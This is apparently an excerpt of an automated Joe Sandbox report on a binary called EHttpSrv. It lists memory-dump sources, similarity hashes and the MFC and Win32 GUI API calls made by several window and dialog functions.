• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: _snwprintf_s
• String ID:
• API String ID: 2338360151-0

Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph (executed / not executed basic blocks; graph data not reproduced here)
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #2461$#310#578#776$#5149#5398NamePathShort$#896EnvironmentExpandStrings_wcsicmpwcsncmp
• String ID: \\?\$system
• API String ID: 4018035189-175627492

Control-flow Graph (executed / not executed basic blocks; graph data not reproduced here)
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #900$#896$#899$#4026$_snwprintf_s$#310#578#776$#1176#2311#4347#6063
• String ID: - $ / $%d.%d.%d.%d$%ls / %d;
• API String ID: 428142261-2105336867
• Opcode ID: ac90e034d3ae0310e7a85c5f209786e44ff2bca9ce7db78bb364263f96657bb2
• Instruction ID: 90043ed17399e709728619cef2eeb1962bfa68706d0e13c2d55a6fd07870de37
• Opcode Fuzzy Hash: ac90e034d3ae0310e7a85c5f209786e44ff2bca9ce7db78bb364263f96657bb2
• Instruction Fuzzy Hash: 16E139715087019FC314DF94CC84A9AB7F5FF98709F008D2DF586976A0EB38AA49DB62

Control-flow Graph
(Control-flow graph rendering not reproduced; the function spans basic blocks 204437e0-20443cb5.)
APIs
• #310.MFC80U(FEEA6C22), ref: 20443812
• #314.MFC80U(00000000), ref: 2044382A
• #2310.MFC80U(?,00000248,00000008,00000009,00000000), ref: 20443894
• #4026.MFC80U(0000020C), ref: 204438DF
• #5149.MFC80U(00000000), ref: 204438E9
• #5149.MFC80U(00000000), ref: 204438F9
  • Part of subcall function 2042E670: #6751.MFC80U(00000000,?,2042E5B8,00000000,FEEA6C22), ref: 2042E688
• #4026.MFC80U(00000243,00000000), ref: 20443A8A
• #776.MFC80U(20485878), ref: 20443A9D
• #5149.MFC80U(00000000), ref: 20443C18
• #5149.MFC80U(00000000), ref: 20443C28
• #578.MFC80U ref: 20443C4B
• #6751.MFC80U(00000000,?,00000000), ref: 20443C8A
• #578.MFC80U(00000000), ref: 20443C9B
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #5149$#4026#578#6751$#2310#310#314#776
• String ID:
• API String ID: 1553475692-0
• Opcode ID: f04ab54d33e1be9fd4d368078cb38f950faa0191a76b32507f1d95f43eafd0ab
• Instruction ID: 5715c73cd8d1d2426d1206603505d36170ae64b3e8ce92e60f464c4ad07a69a9
• Opcode Fuzzy Hash: f04ab54d33e1be9fd4d368078cb38f950faa0191a76b32507f1d95f43eafd0ab
• Instruction Fuzzy Hash: 3EC1C671A48740ABE704EF94DCCDB5D77A0FB44B0AF04892CFA42A62D1DF799908DB52

Control-flow Graph
(Control-flow graph rendering not reproduced; the function spans basic blocks 20452110-204523b6.)
APIs
• #2651.MFC80U(000004D8,00000000), ref: 20452145
• #2155.MFC80U(000004D8,00000000), ref: 2045214C
• #2651.MFC80U(000003EE,00000000,000004D8,00000000), ref: 20452159
• #2155.MFC80U(000003EE,00000000,000004D8,00000000), ref: 20452160
• #2651.MFC80U(000004D0,00000000,000003EE,00000000,000004D8,00000000), ref: 2045216D
• #2155.MFC80U(000004D0,00000000,000003EE,00000000,000004D8,00000000), ref: 20452174
• #2651.MFC80U(00000504,00000000,000004D0,00000000,000003EE,00000000,000004D8,00000000), ref: 20452181
• #2155.MFC80U(00000504,00000000,000004D0,00000000,000003EE,00000000,000004D8,00000000), ref: 20452188
• #2651.MFC80U(0000050A,00000000,00000504,00000000,000004D0,00000000,000003EE,00000000,000004D8,00000000), ref: 20452195
• #2155.MFC80U(0000050A,00000000,00000504,00000000,000004D0,00000000,000003EE,00000000,000004D8,00000000), ref: 2045219C
• #2651.MFC80U(00000505,00000000), ref: 204521E7
• #2155.MFC80U(00000505,00000000), ref: 204521EE
• #2651.MFC80U(000004D9,00000000,00000505,00000000), ref: 204521FB
• #2155.MFC80U(000004D9,00000000,00000505,00000000), ref: 20452202
• #2651.MFC80U(00000509,00000000,000004D9,00000000,00000505,00000000), ref: 2045220F
• #2155.MFC80U(00000509,00000000,000004D9,00000000,00000505,00000000), ref: 20452216
• #2651.MFC80U(000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 20452223
• #2155.MFC80U(000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 2045222A
• #2651.MFC80U(00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 20452237
• #2155.MFC80U(00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 2045223E
• #2651.MFC80U(0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 2045224B
• #2155.MFC80U(0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 20452252
• #2651.MFC80U(00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 2045225F
• #2155.MFC80U(00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 20452266
• #2651.MFC80U(000004D4,00000000,00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 20452273
• #2155.MFC80U(000004D4,00000000,00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 2045227A
• #2651.MFC80U(000003F7,00000000,000004D4,00000000,00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000), ref: 20452287
• #2155.MFC80U(000003F7,00000000,000004D4,00000000,00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000), ref: 2045228E
• #2651.MFC80U(000003F8,00000000,000003F7,00000000,000004D4,00000000,00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000), ref: 2045229B
• #2155.MFC80U(000003F8,00000000,000003F7,00000000,000004D4,00000000,00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000), ref: 204522A2
• SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 204522E1
• #2651.MFC80U(00000499,00000000,?,2045120B,00000001,00000000), ref: 204522EF
• #2155.MFC80U(00000499,00000000,?,2045120B,00000001,00000000), ref: 204522F6
• #2651.MFC80U(0000049A,00000000,00000499,00000000,?,2045120B,00000001,00000000), ref: 20452304
• #2155.MFC80U(0000049A,00000000,00000499,00000000,?,2045120B,00000001,00000000), ref: 2045230B
• #2651.MFC80U(000003F7,00000000,0000049A,00000000,00000499,00000000,?,2045120B,00000001,00000000), ref: 20452319
• #2155.MFC80U(000003F7,00000000,0000049A,00000000,00000499,00000000,?,2045120B,00000001,00000000), ref: 20452320
• #2651.MFC80U(000004D4,00000001,000003F7,00000001,0000049A,00000001,00000499,00000001,?,2045120B,00000001,00000000), ref: 2045232E
• #2155.MFC80U(000004D4,00000001,000003F7,00000001,0000049A,00000001,00000499,00000001,?,2045120B,00000001,00000000), ref: 20452335
• #1176.MFC80U(?,2045120B,00000001,00000000), ref: 2045233F
• #2651.MFC80U(00000499,00000001,?,2045120B,00000001,00000000), ref: 2045237E
• #2155.MFC80U(00000499,00000001,?,2045120B,00000001,00000000), ref: 20452385
• #2651.MFC80U(0000049A,00000001,00000499,00000001,?,2045120B,00000001,00000000), ref: 20452393
• #2155.MFC80U(0000049A,00000001,00000499,00000001,?,2045120B,00000001,00000000), ref: 2045239A
• #2651.MFC80U(000003F7,00000001,0000049A,00000001,00000499,00000001,?,2045120B,00000001,00000000), ref: 204523A8
• #2155.MFC80U(000003F7,00000001,0000049A,00000001,00000499,00000001,?,2045120B,00000001,00000000), ref: 204523AF
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #2155#2651$#1176MessageSend
• String ID:
• API String ID: 3597693756-0
• Opcode ID: bc34519fbc58735ceab56caef8684ec06317434b7573c2e777f47df328bb0116
• Instruction ID: 5b3ee57f764aaf6637235102a7c02bb01dbd315285f2a9fc9a3a034b04cf5d66
• Opcode Fuzzy Hash: bc34519fbc58735ceab56caef8684ec06317434b7573c2e777f47df328bb0116
• Instruction Fuzzy Hash: 4F514070380741AAD91657B14C66FBF26AA8BE2F08F80C52DB6416FAE0CE7C9D03C745
                                                                                                                APIs
                                                                                                                • #4112.MFC80U(00000000,00000400,00000000), ref: 20426994
                                                                                                                • SendMessageW.USER32(?,00000474,00000000,00000000), ref: 204269C4
                                                                                                                • #2366.MFC80U(00000000), ref: 204269C7
                                                                                                                • GetWindowRect.USER32(?,?), ref: 204269DB
                                                                                                                • #5609.MFC80U(?), ref: 204269E4
                                                                                                                • GetWindowRect.USER32(?,?), ref: 204269F2
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001), ref: 20426A17
                                                                                                                • #5609.MFC80U(?,?,?,?,?,00000001), ref: 20426A23
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20426A34
                                                                                                                • #5609.MFC80U(?), ref: 20426A3D
                                                                                                                • #762.MFC80U(00000054,?), ref: 20426A66
                                                                                                                • #1545.MFC80U(50800844,?,?,00000003), ref: 20426AA9
                                                                                                                • #6086.MFC80U(00000000,50800844,?,?,00000003), ref: 20426AB5
                                                                                                                • #2651.MFC80U(00000001,00000000,50800844,?,?,00000003), ref: 20426ACE
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20426ADB
                                                                                                                • #2362.MFC80U(00000000,?,00000003), ref: 20426ADE
                                                                                                                • SendMessageW.USER32(?,00000030,?,00000001), ref: 20426AFD
                                                                                                                • #762.MFC80U(000000DC,?,00000003), ref: 20426B04
                                                                                                                • #1562.MFC80U(50804005,?,?,00000004), ref: 20426B49
                                                                                                                • memset.MSVCR80 ref: 20426BAD
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20426BC5
                                                                                                                • #2362.MFC80U(00000000), ref: 20426BC8
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 20426BDB
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 20426BEF
                                                                                                                • #1271.MFC80U(00000000), ref: 20426BF8
                                                                                                                • CreateFontIndirectW.GDI32 ref: 20426C16
                                                                                                                • #1271.MFC80U(00000000), ref: 20426C1F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                APIs
                                                                                                                • #4577.MFC80U(FEEA6C22,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DD67
                                                                                                                • #4112.MFC80U(00000000,00000400,00000000,FEEA6C22,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DD77
                                                                                                                • #6063.MFC80U(?,00000000,00000400,00000000,FEEA6C22,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DD85
                                                                                                                • #310.MFC80U(?,00000000,00000400,00000000,FEEA6C22,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DD8E
                                                                                                                • #2651.MFC80U(00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DDA0
                                                                                                                • #776.MFC80U(?,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DDB6
                                                                                                                • #6063.MFC80U(?,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DDC9
                                                                                                                • #2651.MFC80U(00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DDD2
                                                                                                                • #776.MFC80U(?,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DDE8
                                                                                                                • #6063.MFC80U(?,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DDFB
                                                                                                                • #2651.MFC80U(00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE07
                                                                                                                • #776.MFC80U(?,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE1D
                                                                                                                • #6063.MFC80U(?,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE30
                                                                                                                • #2651.MFC80U(00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE3C
                                                                                                                • #776.MFC80U(?,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE52
                                                                                                                • #6063.MFC80U(?,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE65
                                                                                                                • #2651.MFC80U(00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE71
                                                                                                                • #776.MFC80U(?,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE87
                                                                                                                • #6063.MFC80U(?,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE9A
                                                                                                                • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 2042DED5
                                                                                                                • #2651.MFC80U(00000001,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF), ref: 2042DEDF
                                                                                                                • #776.MFC80U(?,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9), ref: 2042DEF5
                                                                                                                • #1006.MFC80U(00000000,?,00000000,00000000,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DF0D
                                                                                                                • #2651.MFC80U(00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9), ref: 2042DF16
                                                                                                                • #776.MFC80U(?,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?), ref: 2042DF2C
                                                                                                                • #1006.MFC80U(00000000,?,00000000,00000000,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DF44
                                                                                                                • #2651.MFC80U(00003023,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?), ref: 2042DF50
                                                                                                                • #776.MFC80U(?,00003023,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DF66
                                                                                                                • #1006.MFC80U(00000000,?,00000000,00000000,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DF7E
                                                                                                                • #2651.MFC80U(00003024,00003023,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DF8A
                                                                                                                • #776.MFC80U(?,00003024,00003023,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DFA0
                                                                                                                • #1006.MFC80U(00000000,?,00000000,00000000,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DFB8
                                                                                                                • #2651.MFC80U(00003025,00003024,00003023,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DFC4
                                                                                                                • #776.MFC80U(?,00003025,00003024,00003023,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DFDA
                                                                                                                • #1006.MFC80U(00000000,?,00000000,00000000,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DFF2
                                                                                                                • GetNextDlgTabItem.USER32(?,00000000,00000000), ref: 2042DFFF
                                                                                                                • #2366.MFC80U(00000000,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF), ref: 2042E006
                                                                                                                • #2648.MFC80U(00000000,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF), ref: 2042E015
                                                                                                                • #1005.MFC80U(00000000,00000000,00000000,00000000,00000000,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042E02B
                                                                                                                • GetNextDlgTabItem.USER32(?,?,00000000), ref: 2042E03A
                                                                                                                • #2366.MFC80U(00000000,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF), ref: 2042E041
                                                                                                                • SetForegroundWindow.USER32(?), ref: 2042E054
                                                                                                                • #578.MFC80U(?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042E066
                                                                                                                APIs
                                                                                                                • CopyRect.USER32(?,?), ref: 204379CC
                                                                                                                • #310.MFC80U(?,?,?,?), ref: 204379D6
                                                                                                                • SendMessageW.USER32(00000020,00001200,00000000,00000000), ref: 20437A02
                                                                                                                • #578.MFC80U ref: 20437A18
                                                                                                                • SendMessageW.USER32(00000020,00001207,-000000FF,?), ref: 20437A37
                                                                                                                • #2468.MFC80U ref: 20437A5D
                                                                                                                • SendMessageW.USER32(?,?,?,00000020), ref: 20437A84
                                                                                                                • #5398.MFC80U(000000FF,?,?,?,00000020,0000120B,?,?), ref: 20437A90
                                                                                                                • #347.MFC80U ref: 20437AE3
                                                                                                                • #1270.MFC80U(?), ref: 20437AF5
                                                                                                                • #347.MFC80U(?), ref: 20437AFE
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 20437B10
                                                                                                                • #1270.MFC80U(00000000), ref: 20437B1B
                                                                                                                • #5633.MFC80U(?,?,00000000), ref: 20437B6E
                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 20437BA8
                                                                                                                • #5633.MFC80U(?,00000000,?,?,00000000), ref: 20437BE8
                                                                                                                • #5633.MFC80U(?,?,?,00000000,?,?,00000000), ref: 20437C39
                                                                                                                • BitBlt.GDI32(?,00000100,?,?,?,?,00000000,00000000,00CC0020), ref: 20437C6B
                                                                                                                • #5633.MFC80U(?,00000000), ref: 20437C7E
                                                                                                                • InflateRect.USER32(?,000000F7,000000FD), ref: 20437CB6
                                                                                                                • GetCurrentObject.GDI32(?,00000006), ref: 20437CC3
                                                                                                                • #2362.MFC80U(00000000), ref: 20437CCA
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 20437CFC
                                                                                                                APIs
                                                                                                                • #1176.MFC80U ref: 20450D82
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20450D93
                                                                                                                • #5609.MFC80U(?), ref: 20450DA1
                                                                                                                • #3395.MFC80U(?), ref: 20450DAE
                                                                                                                • #2713.MFC80U(?), ref: 20450DB9
                                                                                                                • GetParent.USER32(?), ref: 20450DC9
                                                                                                                • #2366.MFC80U(00000000), ref: 20450DD0
                                                                                                                • #2648.MFC80U(00000000), ref: 20450DDB
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20450DF1
                                                                                                                • #2362.MFC80U(00000000), ref: 20450DF8
                                                                                                                • memmove_s.MSVCR80 ref: 20450E75
                                                                                                                • #762.MFC80U(00000054,00000000), ref: 20450E91
                                                                                                                • #4109.MFC80U(00000000,?,00000020), ref: 20450EF6
                                                                                                                • SendMessageW.USER32(?,00000030,?,00000001), ref: 20450F0F
                                                                                                                • #4112.MFC80U(00000000,?,00000020), ref: 20450F20
                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 20450F7C
                                                                                                                • SendMessageW.USER32(?,00000184,00000000,00000000), ref: 20450FD3
                                                                                                                • #6086.MFC80U(00000000), ref: 20450FF2
                                                                                                                • #2155.MFC80U(00000000,00000000), ref: 20451010
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,?), ref: 2045105C
                                                                                                                • SendMessageW.USER32 ref: 20451083
                                                                                                                • #6086.MFC80U(00000005), ref: 204510A8
                                                                                                                • #2155.MFC80U(00000001,00000005), ref: 204510C6
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 204510DD
                                                                                                                • #6735.MFC80U(?), ref: 2045110D
                                                                                                                • #2260.MFC80U(0000007C,00000000), ref: 20451127
                                                                                                                • #4101.MFC80U(?,00000000,00000000), ref: 20451159
                                                                                                                • SendMessageW.USER32(?,00000180,00000000), ref: 2045118F
                                                                                                                • #578.MFC80U ref: 2045119E
                                                                                                                • #578.MFC80U ref: 204511C2
                                                                                                                • #6232.MFC80U(00000000), ref: 204511F8
                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 2045D71E
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 2045D723
                                                                                                                • #1555.MFC80U(00000000), ref: 2045D728
                                                                                                                • GetSysColor.USER32(00000005), ref: 2045D72F
                                                                                                                • #1079.MFC80U(?,00000000), ref: 2045D73D
                                                                                                                  • Part of subcall function 20427250: #1079.MFC80U(?,FEEA6C22), ref: 2042728B
                                                                                                                  • Part of subcall function 20427250: #6749.MFC80U(?,?,FEEA6C22), ref: 20427297
                                                                                                                • LoadIconW.USER32(00000000,00007F00), ref: 2045D756
                                                                                                                • DestroyCursor.USER32(00000000), ref: 2045D77F
                                                                                                                • #1079.MFC80U(?,000000FF,00000000), ref: 2045D76C
                                                                                                                  • Part of subcall function 204353D0: #1079.MFC80U(?,FEEA6C22), ref: 2043540B
                                                                                                                  • Part of subcall function 204353D0: #6749.MFC80U(?,?,FEEA6C22), ref: 20435417
                                                                                                                  • Part of subcall function 204353D0: #1176.MFC80U(?,?,FEEA6C22), ref: 20435444
                                                                                                                • #4574.MFC80U ref: 2045D787
                                                                                                                • #4109.MFC80U(00000000,00040000,00000000), ref: 2045D797
                                                                                                                • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 2045D7AF
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 2045D7BE
                                                                                                                • #3869.MFC80U(00000000,Column_0,00000000,00000064,000000FF), ref: 2045D7D3
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 2045D7E8
                                                                                                                • SendMessageW.USER32(?,0000104E,00000000,00000000), ref: 2045D7FA
                                                                                                                • #2366.MFC80U(00000000), ref: 2045D7FD
                                                                                                                • SendMessageW.USER32(?,00000418,00000000,000000A0), ref: 2045D816
                                                                                                                • GetClientRect.USER32(?,0000000A), ref: 2045D821
                                                                                                                • #2651.MFC80U ref: 2045D85C
                                                                                                                • #2651.MFC80U(00000001,0000000A), ref: 2045D86E
                                                                                                                • #2651.MFC80U(00000002,0000000A,00000001,0000000A), ref: 2045D880
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 2045D8A2
                                                                                                                • #2364.MFC80U(00000000), ref: 2045D8A9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
